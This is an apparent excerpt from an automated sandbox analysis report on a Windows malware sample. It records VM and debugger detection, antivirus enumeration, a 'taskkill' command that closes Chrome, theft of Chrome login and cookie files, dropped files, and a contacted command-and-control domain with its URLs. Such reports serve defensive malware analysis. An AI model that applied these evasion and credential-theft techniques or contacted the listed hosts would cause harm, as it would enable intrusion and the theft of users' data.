ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 56BB1610C0318054.exe, 00000002.00000003.276888845.0000000003126000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 56BB1610C0318054.exe, 00000002.00000003.274009815.000000000310D000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP)
Source: ecvD64F.tmp.8.dr Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150353Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=a3f17ad884a74d7f9591079e57f1f35d&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663704&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663704&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 56BB1610C0318054.exe, 00000002.00000003.273800958.0000000003104000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.251729735.0000000002C41000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 56BB1610C0318054.exe, 00000002.00000003.249685348.0000000002E0D000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.252026845.0000000002C6D000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 56BB1610C0318054.exe, 00000002.00000003.274009815.000000000310D000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}
Source: 56BB1610C0318054.exe, 00000004.00000002.260847754.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware Virtual disk 2.0
Source: 56BB1610C0318054.exe, 00000002.00000003.277295939.00000000030E1000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation CounterHB
Source: 56BB1610C0318054.exe, 00000002.00000003.274286153.0000000003113000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}k
Source: 56BB1610C0318054.exe, 00000002.00000003.273776372.0000000003107000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 56BB1610C0318054.exe, 00000004.00000002.260847754.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware
Source: 56BB1610C0318054.exe, 00000002.00000003.276872790.0000000003100000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counterh
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent, 0_2_10019FF0
Hides threads from debuggers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process queried: DebugFlags Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403E2C rdtsc 0_2_00403E2C
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_079BEA04 LdrInitializeThunk, 1_2_079BEA04
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001A010 IsDebuggerPresent, 0_2_1001A010
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00408D68
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h] 0_2_00404E19
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h] 0_2_10019DE0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h] 0_2_10019E13
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h] 0_2_10019E13
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h] 0_2_10019E70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h] 0_2_10019E70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h] 0_2_10019ED0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h] 2_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019E13 mov eax, dword ptr fs:[00000030h] 2_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019E13 mov eax, dword ptr fs:[00000030h] 2_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h] 2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h] 2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h] 2_2_10019ED0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000E90E GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm, 0_2_1000E90E
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer, 0_2_10015354
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter, 0_2_10015376
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 0_2_10018413
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_1000E44D
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10015354 SetUnhandledExceptionFilter,__encode_pointer, 2_2_10015354
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10015376 __decode_pointer,SetUnhandledExceptionFilter, 2_2_10015376
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 2_2_10018413
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F41C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00F41C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4461F SetUnhandledExceptionFilter, 28_2_00F4461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00F4373A
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00F4631F

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError, 0_2_1001A0F0

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001779F cpuid 0_2_1001779F
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: GetLocaleInfoA, 0_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: GetLocaleInfoA, 2_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: GetLocaleInfoA, 28_2_00F47189
Queries device information via Setup API
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 0_2_10019780
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10015254 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_10015254
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00401000 GetVersionExA,GetVersionExA,GetVersionExA,GetVersionExA, 0_2_00401000
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 346134 Sample: Cyfj6XGbkd.exe Startdate: 29/01/2021 Architecture: WINDOWS Score: 93 90 Malicious sample detected (through community Yara rule) 2->90 92 Multi AV Scanner detection for submitted file 2->92 94 Uses ping.exe to sleep 2->94 96 3 other signatures 2->96 10 Cyfj6XGbkd.exe 1 3 2->10         started        15 msiexec.exe 2->15         started        process3 dnsIp4 86 84cfba021a5a6662.xyz 104.21.23.16, 49714, 49715, 49716 CLOUDFLARENETUS United States 10->86 74 C:\Users\user\...\56BB1610C0318054.exe, PE32 10->74 dropped 76 C:\...\56BB1610C0318054.exe:Zone.Identifier, ASCII 10->76 dropped 110 Detected unpacking (creates a PE file in dynamic memory) 10->110 112 Installs new ROOT certificates 10->112 114 Contains functionality to infect the boot sector 10->114 116 5 other signatures 10->116 17 56BB1610C0318054.exe 26 10->17         started        22 56BB1610C0318054.exe 1 15 10->22         started        24 cmd.exe 1 10->24         started        26 msiexec.exe 4 10->26         started        file5 signatures6 process7 dnsIp8 78 84cfba021a5a6662.xyz 17->78 80 84CFBA021A5A6662.xyz 17->80 60 C:\Users\user\AppData\...\1611971443428.exe, PE32 17->60 dropped 62 C:\Users\user\AppData\Local\Temp\xldl.dll, PE32 17->62 dropped 64 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 17->64 dropped 72 7 other files (none is malicious) 17->72 dropped 98 Multi AV Scanner detection for dropped file 17->98 100 Detected unpacking (creates a PE file in dynamic memory) 17->100 102 Machine Learning detection for dropped file 17->102 108 3 other signatures 17->108 28 cmd.exe 17->28         started        31 1611971443428.exe 2 17->31         started        33 ThunderFW.exe 1 17->33         started        82 84cfba021a5a6662.xyz 22->82 66 C:\Users\user\AppData\...\Secure Preferences, UTF-8 22->66 dropped 68 C:\Users\user\AppData\Local\...\Preferences, ASCII 22->68 dropped 104 Tries to harvest and steal browser information (history, passwords, etc) 22->104 35 cmd.exe 1 22->35         started        37 cmd.exe 1 22->37         started        84 127.0.0.1 unknown unknown 24->84 106 Uses ping.exe to sleep 24->106 39 conhost.exe 24->39         started        41 PING.EXE 1 24->41         started        70 C:\Users\user\AppData\Local\...\MSIB2E9.tmp, PE32 26->70 dropped file9 signatures10 process11 signatures12 43 conhost.exe 28->43         started        45 PING.EXE 28->45         started        118 Uses ping.exe to sleep 35->118 47 PING.EXE 1 35->47         started        50 conhost.exe 35->50         started        52 conhost.exe 37->52         started        54 taskkill.exe 1 37->54         started        process13 dnsIp14 88 192.168.2.1 unknown unknown 47->88 56 MpCmdRun.exe 52->56         started        process15 process16 58 conhost.exe 56->58         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.23.16
 unknown United States
13335 CLOUDFLARENETUS false

Private
IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
84CFBA021A5A6662.xyz 104.21.23.16 true
84cfba021a5a6662.xyz 104.21.23.16 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://84cfba021a5a6662.xyz/info_old/g false
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://84cfba021a5a6662.xyz/info_old/e false
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://84cfba021a5a6662.xyz/info_old/w false
  • Avira URL Cloud: safe
 unknown
http://84cfba021a5a6662.xyz/info_old/r false
  • Avira URL Cloud: safe
 unknown
http://84CFBA021A5A6662.xyz/info_old/ddd false
  • Avira URL Cloud: safe
 unknown